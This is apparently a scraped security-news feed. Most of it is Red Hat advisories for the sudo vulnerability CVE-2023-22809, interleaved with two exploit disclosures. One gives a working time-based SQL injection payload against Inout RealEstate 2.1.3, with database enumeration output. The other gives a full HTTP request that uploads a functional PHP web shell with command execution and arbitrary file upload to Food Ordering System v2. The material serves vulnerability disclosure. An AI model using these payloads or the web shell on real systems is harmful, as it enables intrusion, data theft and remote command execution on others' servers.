Red Hat Security Advisory 2023-0280-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:0280-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0280  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 8.1 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
sudo-1.8.25p1-8.el8_1.3.src.rpm

aarch64:  
sudo-1.8.25p1-8.el8_1.3.aarch64.rpm  
sudo-debuginfo-1.8.25p1-8.el8_1.3.aarch64.rpm  
sudo-debugsource-1.8.25p1-8.el8_1.3.aarch64.rpm

ppc64le:  
sudo-1.8.25p1-8.el8_1.3.ppc64le.rpm  
sudo-debuginfo-1.8.25p1-8.el8_1.3.ppc64le.rpm  
sudo-debugsource-1.8.25p1-8.el8_1.3.ppc64le.rpm

s390x:  
sudo-1.8.25p1-8.el8_1.3.s390x.rpm  
sudo-debuginfo-1.8.25p1-8.el8_1.3.s390x.rpm  
sudo-debugsource-1.8.25p1-8.el8_1.3.s390x.rpm

x86_64:  
sudo-1.8.25p1-8.el8_1.3.x86_64.rpm  
sudo-debuginfo-1.8.25p1-8.el8_1.3.x86_64.rpm  
sudo-debugsource-1.8.25p1-8.el8_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY85i0NzjgjWX9erEAQjeaQ/9G/6J6ljScVFsa9hVW9T/iT4qacvnLCxp  
MAY3UGrXJLloSOHiP4gSmkD4iXpqzcmQ9Cep9Ujj6bKvvLCUJO+IggAPqOr58qk7  
NkJ6GUA0riZbkUX+whviXjswfMlZh3qPeacxApEyzRkcjN3zspvkJvgeaMCfrEDN  
r1NwGW+d8oMLoxH0Mji11UL8dv4+W1It1rGU4f/EtI6mkkWApiVisIhWJOuOcTKB  
DdaEz//Mvw4tn+lFcub5tiiDXvxkDXGauyl91CxYAF6TkJSaVDheRsl/0bT/o9JZ  
2k/nsqCE8YbMDqABqsXfm2eZhY7xeo1JM5LhSHPYgMb/NjhECDqdA9ronNDPOBIY  
wAcyDz29gYBGG8ok7tTWZHAbg7I+q4nEJ8pWurx/GzSBFoM3SP2bIlsHvoiSeQNM  
2DAtSFySUPywrvNnXjYNqVMyEw6YkkA4pHNY4nXhoy0D0ms093486/BNoXf33MSX  
swkR75f5swXyozcbqfmftQBst59jdUqBlHyvykCCDGKDUREsQ3rE0iH3eqsaZ6wy  
4ZQDbQViGgoZpv0k1Ii1MQShGzvnH2y2FEKT3r24dOylL9WMQ/ZagPfHgCUgBm21  
BLsZNVXiC0kdIg3dfF5pwWMDdmv2iC1ib3D1gV8opOvuOxaAET3fT9Pmg9hVssmG  
gDfaS4bRp+U=  
=wkX4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0280-01

Inout RealEstate version 2.1.3 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout RealEstate 2.1.3                                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpPOST parameter 'lidaray' is vulnerable to SQLIlidaray=[Inject-HERE]---Parameter: lidaray (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_realestate'[INFO] fetching number of tables for database ''*****_realestate'Database: *****_realestate[45 tables]+--------------------------------+| adcode                         || admin_account                  || admin_payment_details          || agent_list_request_to_user     || broker_citymap                 || broker_rate                    || broker_review                  || brokerabusereport              || category_property              || chat_details                   || chat_messages                  || checkout_ipn                   || countries                      || custom_field                   || detail_statistics_list         || email_templates                || enquiry_status                 || forgetpassword                 || inout_ipns                     || invoicegen                     || languages                      || list_brokermap                 || list_images                    || list_main                      || listopenhouse                  || normal_statistics_list         || paymentdetailstat              || popularsearchlist              || ppc_currency                   || public_side_media_detail       || public_slide_images            || recentsearchlist               || settings                       || sold_listing                   || soldlistadd                    || traveller_bank_deposit_history || user_broker_licenses           || user_broker_registration       || user_email_verification        || user_list_agent_request        || user_registration              || user_wishlist_mapping          || userabusereport                || userlistactive                 || wish_list                      |+--------------------------------+[-] Done

Inout RealEstate 2.1.3 SQL Injection

Red Hat Security Advisory 2023-0284-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:0284-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0284  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
sudo-1.8.29-8.el8_7.1.src.rpm

aarch64:  
sudo-1.8.29-8.el8_7.1.aarch64.rpm  
sudo-debuginfo-1.8.29-8.el8_7.1.aarch64.rpm  
sudo-debugsource-1.8.29-8.el8_7.1.aarch64.rpm

ppc64le:  
sudo-1.8.29-8.el8_7.1.ppc64le.rpm  
sudo-debuginfo-1.8.29-8.el8_7.1.ppc64le.rpm  
sudo-debugsource-1.8.29-8.el8_7.1.ppc64le.rpm

s390x:  
sudo-1.8.29-8.el8_7.1.s390x.rpm  
sudo-debuginfo-1.8.29-8.el8_7.1.s390x.rpm  
sudo-debugsource-1.8.29-8.el8_7.1.s390x.rpm

x86_64:  
sudo-1.8.29-8.el8_7.1.x86_64.rpm  
sudo-debuginfo-1.8.29-8.el8_7.1.x86_64.rpm  
sudo-debugsource-1.8.29-8.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY85izdzjgjWX9erEAQg4SA//aywYFG1DlblFxPi50A7qSriQS/9zmP6H  
G80/ATiO+PVzYGOR+CttdzSevLC38KFJ6xB0AMq/fKlw2Wxofriid3FjsgErh/8O  
FzL/gUqZNLFY11sDaDxdTqQD5n9xRmVOwXimJHYAEhpFinkkJNRoQUQ1Nb8SEJwp  
WCmPqYM1oRU6lHq0q+CDL5GS7zIRB2zndXIRMLIy468/eVGwhXhbqDVHdEttptvy  
hZtOl75MsslbUVqZFYulRLz31byf0Cmd9HTpnRtkagPYP4/ON2ur6pHLGtdTDVNu  
DWCgX6Z+zqtIYSS7vxpGPle2AF1AYnJ2nNMltiDsYnbTFvIbvNEjvT5Rk+Iq6qzh  
CZLHkG6bMhBDwTbpGldqOUynI9ydJv2D6waSvp5MJ57/WnHY9lM472LuCfGH4cmB  
JgDkpX/7zDqvOCmrmTp7KMlnNxLxxNHREFEYcK2Uy4VlyBgABJt0BqL3tib3VLc/  
4pbCq4NaR8zccUDVhe+Q+3ARrc+14U22X3elGQH9IQbzOaI99HHwoGIOQZFCKIsX  
kPLdVtRMp48FiM9xEosd20vgk3nZpIvFV2MPbOnUtgtydspK7QvqZ6KMuI38+n8S  
Ud34u6U0trddUJGgg5iZOJ6m9CQ2aP8fh0Q9g7Yl2kaMZv/5cbe/aPBeK2JtwF9e  
KXTQ8DRWGAI=  
=CWM+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0284-01

Red Hat Security Advisory 2023-0282-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:0282-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0282  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
sudo-debuginfo-1.9.5p2-7.el9_1.1.aarch64.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.aarch64.rpm  
sudo-python-plugin-1.9.5p2-7.el9_1.1.aarch64.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.aarch64.rpm

ppc64le:  
sudo-debuginfo-1.9.5p2-7.el9_1.1.ppc64le.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.ppc64le.rpm  
sudo-python-plugin-1.9.5p2-7.el9_1.1.ppc64le.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.ppc64le.rpm

s390x:  
sudo-debuginfo-1.9.5p2-7.el9_1.1.s390x.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.s390x.rpm  
sudo-python-plugin-1.9.5p2-7.el9_1.1.s390x.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.s390x.rpm

x86_64:  
sudo-debuginfo-1.9.5p2-7.el9_1.1.x86_64.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.x86_64.rpm  
sudo-python-plugin-1.9.5p2-7.el9_1.1.x86_64.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
sudo-1.9.5p2-7.el9_1.1.src.rpm

aarch64:  
sudo-1.9.5p2-7.el9_1.1.aarch64.rpm  
sudo-debuginfo-1.9.5p2-7.el9_1.1.aarch64.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.aarch64.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.aarch64.rpm

ppc64le:  
sudo-1.9.5p2-7.el9_1.1.ppc64le.rpm  
sudo-debuginfo-1.9.5p2-7.el9_1.1.ppc64le.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.ppc64le.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.ppc64le.rpm

s390x:  
sudo-1.9.5p2-7.el9_1.1.s390x.rpm  
sudo-debuginfo-1.9.5p2-7.el9_1.1.s390x.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.s390x.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.s390x.rpm

x86_64:  
sudo-1.9.5p2-7.el9_1.1.x86_64.rpm  
sudo-debuginfo-1.9.5p2-7.el9_1.1.x86_64.rpm  
sudo-debugsource-1.9.5p2-7.el9_1.1.x86_64.rpm  
sudo-python-plugin-debuginfo-1.9.5p2-7.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY85iytzjgjWX9erEAQgSOA/9HsVG8QpHwWmZLGNDktHMFAtuYVfr7ZHY  
DjULGU64gvHLtucB72tvb8tKBIlcANGrb+eMIceeAUd+3xSMbgqvwnW/ky0EXiIP  
zIa4WWCIkmuNFM055mfmfodXwW/tuLvoDRrwXAXOB3Hitx6JRge91k2RgYI9tCm+  
9lp1BJhl4q46XEXMLLKJA3HpJ73cjQIbU7foGPUhA11DZBAy5bY4nCe6dZk2veVL  
Y++nvxkj6IHrjtqwMVxehkhdyNp5Ld4c/MXk+UeJXXWLFqAj7pJBLqEoJJOdJ8sU  
ktEffGrTyEj/m0D7Q68nboLe4+r0Aloz6aJ6M1Qml2aUzGyXQkT21v0lae4FDSVx  
xbiPCbINmZxVCqXvBzuTtqjiBnQ2S3Ac0EN9f2Sa7nFhNvejPkmsYPshM3aJbqdW  
zRpTGtvMbSlihrXosX6VxCxZvsy4DmX46MQlftBa8aiwiaPtFcb2/ZR7J3+k+Ill  
e/wOGWZmSv+nSCWjkP+IAMMPfr+TXJVO1WVBlYx83tMpn5vispVzW2DhyHhjXOxo  
MbYHUUFw5LdvidWqheuJEyP+eDFLu7Uj9/3XsUqGWPnHU8I/ZVp4jWZe9pgmWWys  
8kflMeQlWRPwFiHUarSesJt3Ddyt+wcc02feM0bzAd284wTdw4pQ5yG/7jLGoyyG  
yj0AfEyrkJA=  
=UQ99  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0282-01

Food Ordering System version 2 suffers from a remote shell upload vulnerability.

## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE## Author: nu11secur1ty## Date: 01.23.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0## Description:The Food Ordering System v2 suffers from, File Upload and web-shellupload RCE Vulnerabilities.The upload function for the background image hover of this system isnot sanitizing correctly.The attacker can upload some RCE malicious code and easily destroythis system. The status of this system is awful!## STATUS: HIGH Vulnerability[+] Exploit:```GETPOST /fos/admin/ajax.php?action=save_settings HTTP/1.1Host: pwnedhost.comContent-Length: 6157Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7WOrigin: http://pwnedhost.comReferer: http://pwnedhost.com/fos/admin/index.php?page=site_settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=598nahp235ehmk2broafrh37qqConnection: close------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="name"Online Food Ordering System V2------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="email"info@sample.com------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="contact"+6948 8542 623------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="about"<p style="text-align: center; background: transparent; position:relative;"><span style="font-size:28px;background: transparent;position: relative;">ABOUT US</span></b></span></p><pstyle="text-align: center; background: transparent; position:relative;"><span style="background: transparent; position: relative;font-size: 14px;"><span style="font-size:28px;background: transparent;position: relative;"><b style="margin: 0px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-weight:400; text-align: justify;">&nbsp;is simply dummy text of the printingand typesetting industry. Lorem Ipsum has been the industry&#x2019;sstandard dummy text ever since the 1500s, when an unknown printer tooka galley of type and scrambled it to make a type specimen book. It hassurvived not only five centuries, but also the leap into electronictypesetting, remaining essentially unchanged. It was popularised inthe 1960s with the release of Letraset sheets containing Lorem Ipsumpassages, and more recently with desktop publishing software likeAldus PageMaker including versions of LoremIpsum.</span><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><span style="color: rgb(0, 0, 0); font-family: "OpenSans", Arial, sans-serif; font-weight: 400; text-align:justify;"><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><h2 style="font-size:28px;background: transparent;position: relative;">Where does it come from?</h2><pstyle="text-align: center; margin-bottom: 15px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;font-weight: 400;">Contrary to popular belief, Lorem Ipsum is notsimply random text. It has roots in a piece of classical Latinliterature from 45 BC, making it over 2000 years old. RichardMcClintock, a Latin professor at Hampden-Sydney College in Virginia,looked up one of the more obscure Latin words, consectetur, from aLorem Ipsum passage, and going through the cites of the word inclassical literature, discovered the undoubtable source. Lorem Ipsumcomes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum etMalorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.This book is a treatise on the theory of ethics, very popular duringthe Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sitamet..", comes from a line in section1.10.32.</p></span></b></span></p>------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="img"; filename="pic.php"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html>  <head>    <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">    <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>    <script type="text/javascript">      function FocusIn(obj)      {        if(obj.value == obj.defaultValue)          obj.value = '';      }            function FocusOut(obj)      {        if(obj.value == '')          obj.value = obj.defaultValue;      }    </script>  </head>  <body>    <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];echo $_SERVER['REQUEST_URI'] ?></b><br><br>        HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>    REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>        <br>        <form name="cmd_exec" method="post" action="http://<?php echo$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">      <input type="text" name="cmd" size="70" maxlength="500"value="Input command to execute"onfocus="FocusIn(document.cmd_exec.cmd)"onblur="FocusOut(document.cmd_exec.cmd)">      <input type="submit" name="exec" value="exec">    </form>    <?php      if(isset($_POST['exec']))      {        exec($_POST['cmd'],$result);        echo '----------------- < OutPut > -----------------';        echo '<pre>';        foreach($result as $print)        {          $print = str_replace('<','<',$print);          echo $print . '<br>';        }        echo '</pre>';      }      else echo '<br>';    ?>        <form enctype="multipart/form-data" name="file_upload" method="post"action="http://<?php echo $_SERVER['HTTP_HOST']; echo$_SERVER['REQUEST_URI'] ?>">      <input type="file" name="file">      <input type="submit" name="upload" value="upload"><br>      <input type="text" name="target" size="100" value="Location wherefile will be uploaded (include file name!)"onfocus="FocusIn(document.file_upload.target)"onblur="FocusOut(document.file_upload.target)">    </form>    <?php      if(isset($_POST['upload']))      {        $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);                if($check == TRUE)          echo '<pre>The file was uploaded successfully!!</pre>';        else          echo '<pre>File Upload was failed...</pre>';      }    ?>  </body></html>------WebKitFormBoundaryqYQLHPx3VuntGH7W--```[+] Response:```HTTPHTTP/1.1 200 OKDate: Mon, 23 Jan 2023 12:27:44 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)## Proof and Exploit:[href](https://streamable.com/c026hq)## Time spent`01:00:00`

Food Ordering System 2 Shell Upload

Red Hat Security Advisory 2023-0287-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:0287-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0287  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 6 Extended  
Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 6 ELS) - i386, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 6 ELS) - i386, s390x, x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux Server (v. 6 ELS):

Source:  
sudo-1.8.6p3-29.el6_10.7.src.rpm

i386:  
sudo-1.8.6p3-29.el6_10.7.i686.rpm  
sudo-debuginfo-1.8.6p3-29.el6_10.7.i686.rpm

s390x:  
sudo-1.8.6p3-29.el6_10.7.s390x.rpm  
sudo-debuginfo-1.8.6p3-29.el6_10.7.s390x.rpm

x86_64:  
sudo-1.8.6p3-29.el6_10.7.x86_64.rpm  
sudo-debuginfo-1.8.6p3-29.el6_10.7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6 ELS):

i386:  
sudo-debuginfo-1.8.6p3-29.el6_10.7.i686.rpm  
sudo-devel-1.8.6p3-29.el6_10.7.i686.rpm

s390x:  
sudo-debuginfo-1.8.6p3-29.el6_10.7.s390.rpm  
sudo-debuginfo-1.8.6p3-29.el6_10.7.s390x.rpm  
sudo-devel-1.8.6p3-29.el6_10.7.s390.rpm  
sudo-devel-1.8.6p3-29.el6_10.7.s390x.rpm

x86_64:  
sudo-debuginfo-1.8.6p3-29.el6_10.7.i686.rpm  
sudo-debuginfo-1.8.6p3-29.el6_10.7.x86_64.rpm  
sudo-devel-1.8.6p3-29.el6_10.7.i686.rpm  
sudo-devel-1.8.6p3-29.el6_10.7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY85iyNzjgjWX9erEAQjFCw//ao0B02ioJTc/ydsr7P4Yf1yUbj82TggT  
iWabokAmLQyAowD1XJ0de7e3z3aQ5oTVvPfR3LJTZwU9xLxjU/VVj2ha6K+oHiwF  
JP1uwBeC9gZbKb5TZCsZ8nvFTRdKT9DaPwfXUNilUPMx6QMlqktiZjRP+Rlbs5E/  
mnPjUy9U+DfbQ+u2IewkBVlFiNvHg52bkFvG7rqMZb6y70ezWCrFN9zu2yuyhAfi  
ZA+bjWJmznI235OW7EEMe1MxC755kH2qrZv+abx09RqGOM7rzaihquo20dLOFMQO  
m8zXnr86xNLwCFHB8USSK6qLshTIUSt10mips7FLXiNQgVUesMAFxQPvE1iVpSjA  
3DD3WwQqzQTLza/AbE/AgCTmkmstgne9sLibCD+e39O0derx7uJKJ8qejd6nr4Xg  
6MQUCchBmwNpokbvDe3WhGLPg3jbIMTOlx3xNdtP+Uw8NdzIuL0telva20oAQlF0  
3to4NxiUCgs/C91YdJArmMVy9zY4jl7vRjc+50F1fmqmYGc80oeksmFqtQkJ2z8N  
MqJVUZl9MPpe4fntxKYg9fPMArUJSHKUg61+IJGMTfkvEXvIsg0u3pcCPpjHkPK0  
07b/voHuknb/+AD1KsNUvX6LGcwZyuOqeg6BeH5yL4VddANlGzxRqnwkYeTRzTrd  
2cGDnu4cVrk=  
=pIGY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
